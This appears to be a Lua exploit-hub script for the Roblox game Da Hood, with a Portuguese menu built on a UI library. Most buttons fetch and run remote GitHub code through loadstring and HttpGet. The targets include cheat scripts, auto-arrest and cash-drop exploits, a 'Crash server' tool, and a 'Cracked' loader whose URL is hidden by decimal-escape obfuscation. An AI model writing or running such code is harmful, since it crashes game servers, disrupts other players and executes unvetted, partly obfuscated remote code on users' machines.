local Material = loadstring(game:HttpGet("https://raw.githubusercontent.com/Kinlei/MaterialLua/master/Module.lua"))()

local UI = Material.Load({
     Title = "Da hood v3.3",
     Style = 3,
     SizeX = 400,
     SizeY = 300,
     Theme = "Light"
})

local BemVindas = UI.New({
    Title = "Bem-Vindas"
})
BemVindas.Button({
    Text = "Bem vindo "..game.Players.LocalPlayer.Name.."!"
})
BemVindas.Button({
    Text = "Sair do jogo [ cuidado para nn clicar semquerer ]",
    Callback = function()
        local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Title = Instance.new("TextLabel")
local Text = Instance.new("TextLabel")
local Button2 = Instance.new("TextButton")
local Button1 = Instance.new("TextButton")

Button1.Text = "sim" -- Primeiro
Button2.Text = "nao" -- Segundo
Title.Text = "Deseja realmente" -- Titulo
Text.Text = "sair?" -- Texto
function Ativa()
	game.Players.LocalPlayer:kick()
end
ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
Frame.BackgroundTransparency = 0.400
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(1.833999991, 0, 0.81400001, 0)
Frame.Size = UDim2.new(0, 170, 0, 56)

Title.Name = "Title"
Title.Parent = Frame
Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Title.BackgroundTransparency = 1.000
Title.Size = UDim2.new(1, 0, 0, 15)
Title.Font = Enum.Font.SourceSans
Title.TextColor3 = Color3.fromRGB(0, 0, 0)
Title.TextSize = 14.000

Text.Name = "Text"
Text.Parent = Frame
Text.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Text.BackgroundTransparency = 1.000
Text.Position = UDim2.new(0, 0, 0.357142866, 0)
Text.Size = UDim2.new(1, 0, 0.375, 15)
Text.Font = Enum.Font.SourceSans
Text.TextColor3 = Color3.fromRGB(0, 0, 0)
Text.TextSize = 14.000
Text.TextWrapped = true

Button2.Name = "Button2"
Button2.Parent = Frame
Button2.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
Button2.BackgroundTransparency = 0.400
Button2.Position = UDim2.new(0.517647088, 0, 1, 0)
Button2.Size = UDim2.new(0, 82, 0, 26)
Button2.Font = Enum.Font.SourceSans
Button2.TextColor3 = Color3.fromRGB(0, 0, 0)
Button2.TextSize = 14.000
Button2.MouseButton1Click:Connect(function()
	Frame:TweenPosition(UDim2.new(1.833999991, 0, 0.81400001, 0), "In", "Quart", 1)
end)
Button1.Name = "Button1"
Button1.Parent = Frame
Button1.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
Button1.BackgroundTransparency = 0.400
Button1.Position = UDim2.new(0, 0, 1, 0)
Button1.Size = UDim2.new(0, 88, 0, 26)
Button1.Font = Enum.Font.SourceSans
Button1.TextColor3 = Color3.fromRGB(0, 0, 0)
Button1.TextSize = 14.000
Button1.MouseButton1Click:Connect(function()
	Frame:TweenPosition(UDim2.new(1.833999991, 0, 0.81400001, 0), "In", "Quart", 1)
	Ativa()
end)
wait()
Frame:TweenPosition(UDim2.new(0.833999991, 0, 0.81400001, 0), "Out", "Quart", 1)
    end
})

local PaginaVendas = UI.New({
    Title = "Para vender DHC"
})

local Scripts = UI.New({
    Title = "Outras scripts"
})
Scripts.Button({
    Text = "Aqui temos algumas scripts para Da hood abaixo!",
    Callback = function()
        print("Aqui temos algumas scripts para Da hood abaixo!")
    end
})
Scripts.Button({
    Text = "Swag mode",
    Callback = function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SwagModeV002"))()
    end
})
Scripts.Button({
    Text = "Faded script",
    Callback = function()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/nighter132/Faded/main/YesEpic", true))()
    end
})
Scripts.Button({
    Text = "Valiant",
    Callback = function()
        loadstring(game:HttpGet('https://raw.githubusercontent.com/ilxsxmuuu/OutrasScripts/main/valiant', true))()
    end
})
Scripts.Button({
    Text = "Racemodex [ Cracked ]",
    Callback = function()
        loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\69\122\100\114\111\112\49\49\47\65\110\116\105\45\115\116\111\109\112\47\109\97\105\110\47\69\120\116\114\97\83\116\117\102\102\34\41\41\40\41\10")()
    end
})
Scripts.Button({
    Text = "Synapse changer [ Animacao ]",
    Callback = function()
        loadstring(game:HttpGet('https://raw.githubusercontent.com/ilxsxmuuu/OutrasScripts/main/Animation%20changer', true))()
    end
})
Scripts.Button({
    Text = "Auto buy [ Revolver, Double barrel 12, pizza, 3440$S ]",
    Callback = function()
        loadstring(game:HttpGet('https://raw.githubusercontent.com/ilxsxmuuu/OutrasScripts/main/Auto%20buy', true))()
    end
})
Scripts.Button({
    Text = "All animations by roblox",
    Callback = function()
        loadstring(game:HttpGet('https://raw.githubusercontent.com/ilxsxmuuu/OutrasScripts/main/All%20animations%20roblox', true))()
    end
})
Scripts.Button({
    Text = "Zordion [ precisa de key, mas voce ja sabe qual é ]",
    Callback = function()
        repeat
	wait()
	until game:IsLoaded()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/zordion/main/script.lua"))()
    end
})
Scripts.Button({
    Text = "Auto arreset players",
    Callback = function()
        loadstring(game:HttpGet(("https://raw.githubusercontent.com/Raycodex/Exploiting/main/Roblox/Da%20Hood%20Auto%20Arrest"), true))()
    end
})
Scripts.Button({
    Text = "Auto farm lettuce [ reset to stop ]",
    Callback = function()
        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-86, 23, -633)
wait(0.3)
while true do
    fireclickdetector(game:GetService("Workspace").Ignored.Shop["[Lettuce] - $5"].ClickDetector, 1)
    wait(0.7)
    loadstring(game:HttpGet('https://raw.githubusercontent.com/ilxsxmuuu/OutrasScripts/main/auto%20equip%20lettuce', true))()
    wait()
    game:GetService("Workspace").Players[game.Players.LocalPlayer.Name]["[Lettuce]"]:Activate()
    wait(0.8)
end

    end
})
PaginaVendas.Button({
    Text = "Crash server",
    Callback = function()
        local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Title = Instance.new("TextLabel")
local Text = Instance.new("TextLabel")
local Button2 = Instance.new("TextButton")
local Button1 = Instance.new("TextButton")

Button1.Text = "sim" -- Primeiro
Button2.Text = "nao" -- Segundo
Title.Text = "Deseja realmente" -- Titulo
Text.Text = "Executar, Crash server?" -- Texto
function Ativa()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
end
ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
Frame.BackgroundTransparency = 0.400
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(1.833999991, 0, 0.81400001, 0)
Frame.Size = UDim2.new(0, 170, 0, 56)

Title.Name = "Title"
Title.Parent = Frame
Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Title.BackgroundTransparency = 1.000
Title.Size = UDim2.new(1, 0, 0, 15)
Title.Font = Enum.Font.SourceSans
Title.TextColor3 = Color3.fromRGB(0, 0, 0)
Title.TextSize = 14.000

Text.Name = "Text"
Text.Parent = Frame
Text.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Text.BackgroundTransparency = 1.000
Text.Position = UDim2.new(0, 0, 0.357142866, 0)
Text.Size = UDim2.new(1, 0, 0.375, 15)
Text.Font = Enum.Font.SourceSans
Text.TextColor3 = Color3.fromRGB(0, 0, 0)
Text.TextSize = 14.000
Text.TextWrapped = true

Button2.Name = "Button2"
Button2.Parent = Frame
Button2.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
Button2.BackgroundTransparency = 0.400
Button2.Position = UDim2.new(0.517647088, 0, 1, 0)
Button2.Size = UDim2.new(0, 82, 0, 26)
Button2.Font = Enum.Font.SourceSans
Button2.TextColor3 = Color3.fromRGB(0, 0, 0)
Button2.TextSize = 14.000
Button2.MouseButton1Click:Connect(function()
	Frame:TweenPosition(UDim2.new(1.833999991, 0, 0.81400001, 0), "In", "Quart", 1)
end)
Button1.Name = "Button1"
Button1.Parent = Frame
Button1.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
Button1.BackgroundTransparency = 0.400
Button1.Position = UDim2.new(0, 0, 1, 0)
Button1.Size = UDim2.new(0, 88, 0, 26)
Button1.Font = Enum.Font.SourceSans
Button1.TextColor3 = Color3.fromRGB(0, 0, 0)
Button1.TextSize = 14.000
Button1.MouseButton1Click:Connect(function()
	Frame:TweenPosition(UDim2.new(1.833999991, 0, 0.81400001, 0), "In", "Quart", 1)
	Ativa()
end)
wait()
Frame:TweenPosition(UDim2.new(0.833999991, 0, 0.81400001, 0), "Out", "Quart", 1)
    end
})
PaginaVendas.Button({
    Text = "Cash drop",
    Callback = function()
        loadstring(game:HttpGet(("https://raw.githubusercontent.com/Raycodex/Exploiting/main/Roblox/Da%20Hood%20Auto%20Cash%20Drop"), true))()
    end
})
local UpdatesPage = UI.New({
    Title = "Updates!"
})
UpdatesPage.Button({
    Text = "Versão V3.3",
})
UpdatesPage.Button({
    Text = 'Novidades: 1 novas scripts na pagina "Outras scripts!"',
})
